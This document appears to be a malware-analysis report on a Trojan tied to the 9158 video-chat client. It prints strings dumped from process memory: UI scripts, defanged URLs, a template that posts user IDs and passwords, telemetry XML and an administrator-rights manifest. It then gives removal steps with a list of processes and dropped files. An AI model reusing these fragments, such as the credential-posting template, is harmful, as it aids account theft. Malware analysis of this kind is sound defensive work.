.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }
.photo .img .img_in { display:table; width:480px; height:640px; }
.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }
.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }
* html .photo .img img {
_width: expression(this.offsetWidth > 480 ? '480px': true); }
.photo .prev, .photo .prev:hover,
.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }
.photo .prev { left:10px; }
.photo .prev:hover { }
.photo .next { right:10px; _left:445px; }
.photo .next:hover { }
.photo .down,
.photo .down:hover,
.photo .share_t,
.photo .share_t:hover,
.photo .share_qzone,
.photo .share_qzone:hover,
.photo .share_weibo,
.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }
.photo .down { left:350px; }
.photo .down:hover { }
.photo .share_t { left:120px; }
.photo .share_t:hover { }
.photo .share_qzone { left:180px; }
.photo .share_qzone:hover { }
.photo .share_weibo { left:240px; }
.photo .share_weibo:hover { }
<script type='text/javascript'>window.onerror=function(){return true;}; var m_total=0; var nowpos=-1; var Astr
function UrlEncode(s) { var hex=''; var i,j,t; j=0; for (i=0; i<s.length; i  ) { t = hexfromdec( s.charCodeAt(i) ); if (t=='25') { t=''; } hex  = '%'   t; } return hex; } function hexfromdec(num) { if (num > 65535) { return ('err!') } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (getletter(third) getletter(fourth)); } function getletter(num) { if (num < 10) { return num; } else { if (num == 10) { return 'A'; } if (num == 11) { return 'B'; } if (num == 12) { return 'C'; } if (num == 13) { return 'D'; } if (num == 14) { return 'E'; } if (num == 15) { return 'F'; } } }
document.getElementById('showimg').src = Astr[nowpos];
function downit(){ window.external.downloadpic(Astr[nowpos]);} function linkit(t){ if(t==1) { window.open('hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=
&url=hXXp://VVV.9158.com&appkey=ce15e084124446b9a612a5c29f82f080&site=VVV.9158.com&pic=' Astr2[nowpos]); } if(t==2) { window.open('hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' Astr2[nowpos] '&title=
&summary=&pics=' Astr2[nowpos]); } if(t==3) { window.open('hXXp://service.weibo.com/share/share.php?title=
&url=hXXp://VVV.9158.com&source=bookmark&appkey=2992571369&ralateUid=&pic=' Astr2[nowpos]); } }
var arVersion = navigator.appVersion.split('MSIE');
if ((version >= 5.5) && (version < 7) && (document.body.filters))
var imgID = (myImage.id) ? "id='"   myImage.id   "' " : "";
var imgClass = (myImage.className) ? "class='"   myImage.className   "' " : "";
var imgTitle = (myImage.title) ? "title='"   myImage.title   "' " : "title='"   myImage.alt   "'";
var imgStyle = "display:inline-block;"   myImage.style.cssText;
var strNewHTML = "<span "   imgID   imgClass   imgTitle   " style='"   "width:"   myImage.width   "px; height:"   myImage.height   "px;"   imgStyle   ";"   "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader"   "(src='"   myImage.src   "', sizingMethod='scale');'></span>";
myImage.outerHTML = strNewHTML;
window.onload=function(){
<a href='#prev' onmouseover='javascript:prev.src="#path#prev2.png"' onmouseout='javascript:prev.src="#path#prev.png"' onclick='javascript:imgchange(0)' class='prev' title='
'><img id='prev' src='#path#prev.png' onload='fixPNG(this)' /></a>
<a href='#next' onmouseover='javascript:next.src="#path#next2.png"' onmouseout='javascript:next.src="#path#next.png"' onclick='javascript:imgchange(1)' class='next' title='
'><img id='next' class='img_png' src='#path#next.png' onload='fixPNG(this)' /></a>
<a href='#down' onclick='downit()' ondblclick='' onmouseover='javascript:down.src="#path#down2.png"' onmouseout='javascript:down.src="#path#down1.png"' class='down' title='
'><img id='down' class='img_png' src='#path#down1.png' onload='fixPNG(this)' /></a>
<a href='#share_t' onclick='linkit(1);' onmouseover='javascript:share_t.src="#path#share_t2.png"' onmouseout='javascript:share_t.src="#path#share_t1.png"' class='share_t' title='
'><img id='share_t' class='img_png' src='#path#share_t1.png' onload='fixPNG(this)' /></a>
<a href='#share_qzone' onclick='linkit(2);' onmouseover='javascript:share_qzone.src="#path#share_qzone2.png"' onmouseout='javascript:share_qzone.src="#path#share_qzone1.png"' class='share_qzone' title='
'><img id='share_qzone' class='img_png' src='#path#share_qzone1.png' onload='fixPNG(this)' /></a>
<a href='#share_weibo' onclick='linkit(3);' onmouseover='javascript:share_weibo.src="#path#share_weibo2.png"' onmouseout='javascript:share_weibo.src="#path#share_weibo1.png"' class='share_weibo' title='
'><img id='share_weibo' class='img_png' src='#path#share_weibo1.png' onload='fixPNG(this)' /></a></div>
nowpos=%d;imgchange(1);</script>
Astr[m_total]='%s'; Astr2[m_total]='%s'; m_total  ;
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
SkinRes\buttonclose.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
<a target='_blank' href='%s'>%s</a>
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
<script>window.onerror=function(){return true;};function isSecurity(v){var sinfo;if (v.length < 3) { return 0;} var lv = -1; if (v.match(/[a-z]/ig)){lv  ;} if (v.match(/[0-9]/ig)){lv  ;} if (v.match(/(.[^a-z0-9])/ig)){lv  ;} if (v.length < 6 && lv > 0){lv--;}switch (lv) {case 0:sinfo='<font color=red>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:0px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:#d5eaff;}td{padding-right:5px;height:15px;font-size:12px;color:#666666}a{color: #0b66c2; text-decoration:none;};a:hover{color: #0b66c2; text-decoration:underline;};</style><body>
SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
<table onMouseOver='window.external.OnKillTimer(0)' onMouseOut='window.external.OnSetTimer(0)' width='100%%' height='100%%' border='0' cellpadding='0' cellspacing='0' align=center><tr><td bgcolor=#c8e3ff width=84 align=right>
:</td><td width=15> </td><td width=90>%s</td><td></td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td colspan=2>%s</td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td id=passqd name=passqd style='color:red'></td><td><a href='%s' align=left target=_blank>
:</td><td></td><td>%s</td><td><a href='%s' align=left target=_blank>
:</td><td></td><td style='color:gray'>%s</td><td><a href='%s' align=left target=_blank>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:5px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:white;}td{height:19px;font-size:12px;color:#666666}a{color: blue; text-decoration:underline;};</style><body>
SkinRes/userlogininfo.png
lastlogin:
%sid=%s&idx=%s
SkinRes\HeadInfo\set.bmp
SkinRes\HeadInfo\bind.bmp
SkinRes\HeadInfo\close.bmp
UserInfoDlg_password2
<body style="overflow:scroll;overflow-x:hidden;overflow-y:hidden;margin:0;background:url('
SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
{47B2178B-6E4A-49B4-9860-9B1836990CA9}
{6C9A41B3-ABB2-45F7-B591-93456A6FCD20}
{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}
<a href='%s' target=_blank style='display:block; position:absolute; width:134px; height:40px; left:38px; top:227px;'> </a>
%s<br>
<div style='position:absolute;right:20px;top:10px'><input type=checkbox onclick='window.external.setPayState(this.checked)'>
//skinres//vipendtime1.png
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background:#000 url(%s);overflow-x:hidden;overflow-y:hidden;background-size:auto;font-size:12px;color:black'> </body>
//skinres//vipendtime2.png
skinres\WarehouseBG.bmp
CWebBrowser2
/**%nick/**
hXXp://room.9158.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
#':<@%' 
!%(.FHL
___???***666
(Y%C|B^
*X.Gv<S
*`.Gz
.X7Kw.Dx*<n$4e%8k7Kv4K{@V
(W.CuC^
*&)@??%$*
'L":a.Ds 8f.?l0:^
D%3[.Dp
1&-T.Bg
,Y.Cr,@n*?h6N{[o
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
!"#$%&'()* ,
{8856F961-340A-11D0-A96B-00C04FD705A2}
2014-4-4 10
(192.168.1.44)
6, 9, 4, 0
Login
Windows

9158IE.exe_3116:

.text
`.rdata
@.data
.rsrc
j SSSSSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
WINMM.dll
?SetJpegQuality@CxImage@@QAEXE@Z
publictool.dll
9158IE.exe
public.dll
NetworkOpt.dll
DEBUG:%s,%d
%d|%d|%d|%d|%d|%d|%d|%d|%d|%d|
MixerXP.dll FAILED
MixerXP.dll
zzzzzzzzzzzzz333 %d %d %d
zzzzzzzzzzzzz111 %d %d %d
zzzzzzzzzzzzz222 %d %d %d
SOFTWARE\9158web
AVUI.dll
qqqqqqqq2:%d %d %d %d
%s|%d
<style> .topNav {display:none; width: 100%; z-index: 100; overflow: visible; position: fixed; bottom: 0px; _position: absolute; _top: expression(documentElement.scrollBottom   0   'px'); background-color:#fff7de; height: 30px; }</style>
<script>function Fbottomshow(str) { document.getElementById ('bottomshow').style.display = 'block'; document.getElementById ('bottomshow').innerHTML = str; }</script>
<script>var bScrollState=-1,nType=0; window.onscroll = function(){
{ if(bScrollState!=0) { window.external.ScrollBtnSet(nType,1); } bScrollState=0; } else
{ if(bScrollState!=1) { window.external.ScrollBtnSet(nType,0); } bScrollState=1; } };</script>
<script>var bScrollState=-1,nType=1; window.onscroll = function(){
<script>var bScrollState=-1,nType=9; window.onscroll = function(){
if(document.body){
bodyScrollTop = document.body.scrollTop;
if(document.documentElement){
documentScrollTop = document.documentElement.scrollTop;
bodyScrollHeight = document.body.scrollHeight;
documentScrollHeight = document.documentElement.scrollHeight;
if(document.compatMode == 'CSS1Compat'){
windowHeight = document.documentElement.clientHeight;
windowHeight = document.body.clientHeight;
<style>.fixed{ position:fixed;top:0px;left:0px;z-index:999;height:74px;overflow:hidden} .ie6{ _position:absolute; _margin-top: 0; _top:expression(documentElement.scrollTop)} .c1{text-decoration:none;height:24px;background:#ffc1c1; border:1px solid #f4a8a8;} .c2{cursor:hand;text-decoration:none;float:left;font-size:12px;width:182px; overflow:hidden; white-space:nowrap;color:#392729; height:24px; line-height:24px;vertical-align:middle;padding-left:5px} .c3{cursor:hand;font-size:14px;float:right;width:16px;height:16px;padding:4px 5px 0 0;} </style><div class='fixed ie6' id='fixit' name='fixit'></div> <script type='text/javascript'> function intval(v){ v = parseInt(v); return isNaN(v) ? 0 : v; } function getPos(e){ var l = 0; var t = 0; var w = intval(e.style.width); var h = intval(e.style.height); var wb = e.offsetWidth; var hb = e.offsetHeight; while (e.offsetParent) { l  = e.offsetLeft   (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t  = e.offsetTop   (e.currentStyle ? intval(e.currentStyle.borderTopWidth) : 0); e = e.offsetParent; } l  = e.offsetLeft   (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t  = e.offsetTop   (e.currentStyle ? intval(e.currentStyle.borderTopWidth) : 0); return { x: l, y: t, w: w, h: h, wb: wb, hb: hb }; } function getScroll(){ var t, l, w, h; if (document.documentElement && document.documentElement.scrollTop) { t = document.documentElement.scrollTop; l = document.documentElement.scrollLeft; w = document.documentElement.scrollWidth; h = document.documentElement.scrollHeight; } else if (document.body) { t = document.body.scrollTop; l = document.body.scrollLeft; w = document.body.scrollWidth; h = document.body.scrollHeight; } return { t: t, l: l, w: w, h: h }; } function scroller(el, duration){ if (typeof el != 'object') { el = document.getElementById(el); } if (!el) return; var z = this; z.el = el; z.p = getPos(el); z.s = getScroll(); z.clear = function(){ window.clearInterval(z.timer); z.timer = null }; z.t = (new Date).getTime(); z.step = function(){ var t = (new Date).getTime(); var p = (t - z.t) / duration; if (t >= duration   z.t) { z.clear(); window.setTimeout(function(){ z.scroll(z.p.y, z.p.x) }, 13); } else { st = ((-Math.cos(p * Math.PI) / 2)   0.5) * (z.p.y - z.s.t)   z.s.t; sl = ((-Math.cos(p * Math.PI) / 2)   0.5) * (z.p.x - z.s.l)   z.s.l; z.scroll(st, sl); } }; z.scroll = function(t, l){ window.scrollTo(l, t) }; z.timer = window.setInterval(function(){ z.step(); }, 13); } </script><script> var str; var AID=new Array; var nownum=0; function closeit(id) { document.getElementById("fixit").removeChild(document.getElementById("a_" id)); if(AID[0] == id) { AID[0]=AID[1]; AID[1]=AID[2]; } else if(AID[1] == id) AID[1]=AID[2]; else if(AID[2] == id) AID[1]=""; nownum--; if(nownum==0) window.external.HaveAnchor(0); } function newit(id,str) { window.external.HaveAnchor(1); if(nownum==3) { closeit(AID[0]); AID[2]=id; } else { AID[nownum]=id; } str="<div id='a_" id "' class='c1'><span class='c2' onclick=scroller('tag_" id "',800);closeit(" id ");>" str "</span><span onclick='closeit(" id ")' class='c3'><img border=0 src='#path#/SkinRes/star/close.png'></span></div><div style='clear:both'></div>"; document.getElementById("fixit").innerHTML=str document.getElementById("fixit").innerHTML; nownum  ; } </script>
<script>window.onerror=function(){return true;};var hearinterval;function AddSwf(sContent){document.getElementById('mybg').style.display='block';document.getElementById('mybg').innerHTML=sContent;clearInterval(hearinterval);hearinterval=window.setInterval('heartBeat()',1);}function swfMovieEnd(){clearInterval(hearinterval);document.getElementById('mybg').innerHTML='';document.getElementById('mybg').style.display='none';}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><script>var lastScrollY=0;function heartBeat(){var diffY;diffY=document.body.scrollTop;percent=.3*(diffY-lastScrollY);percent=Math.ceil(percent);document.all.mybg.style.pixelTop =percent;lastScrollY=lastScrollY percent;}</script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body style='overflow-x:hidden;overflow-y:scroll' bgcolor=#e8f3ff style="word-break:break-all"><div id='mybg' name='mybg' style='display:none;position:absolute;left:50%;width:500px;margin-left:-200px;top:0;height:350px;'></div>
<script> function DoWelcome(id,str){var obj=document.getElementById(id);if(obj.innerHTML.indexOf('
')>0) {return;}else{document.getElementById(id).innerHTML="<span style='color:#ccc; underline:none; font-weight:bold; padding-left:10px;'>  
</span>";window.external.DoForwardNotice(str);}}</script></html>
<script>window.onerror=function(){return true;}; function shake(n) {
if (window.top.moveBy) {
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i);
window.top.moveBy(-i,0);
}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body overflow:scroll;overflow-x:hidden; bgcolor=#e8f3ff style="word-break:break-all">
%s9158IE.exe
JoinOpenTreasuryBox
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
filenew.9158.com
room/imgout1.aspx
.PAVCException@@
%u / %u
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="trackdata"; filename="%s"
--%s--
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
szData=%s
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid><hardw>%s</hardw></info>
%s|%.2f|%d|%.2f
Content-Type: application/x-www-form-urlencoded
.PAVCInternetException@@
VideoHelper.dll
9158VCComm.dll
5.0.0.3
CWebBrowser2
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
9158IE.EXE


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    9158chat2_ktv088_63.exe:2116
    sr.exe:244
    9158IE.exe:3116
    xianfengkunbang.exe:1324
    BaiduP2PService.exe:252
    BaiduP2PService.exe:472
    RsMgrSvc.exe:1936
    regsvr32.exe:2380
    regsvr32.exe:2448
    regsvr32.exe:2328
    regsvr32.exe:2480
    9158.exe:3012
    popwndexe.exe:760
    xianfengupdate.exe:660
    %original file name%.exe:1736

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\жÔØ 9158¶àÈËÊÓƵ.lnk (715 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓƵ\9158¶àÈËÊÓƵ.lnk (707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
    %Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓƵ.lnk (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
    %Program Files%\tools\BaiduP2PService.exe (17848 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
    %Program Files%\tools\P2PStatReport.dll (12536 bytes)
    %Program Files%\tools\P2SBase.dll (18424 bytes)
    %Program Files%\tools\P2PBase.dll (17848 bytes)
    %Program Files%\tools\sr.exe (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
    %Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
    C:\temp.icon (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
    %Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
    %Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
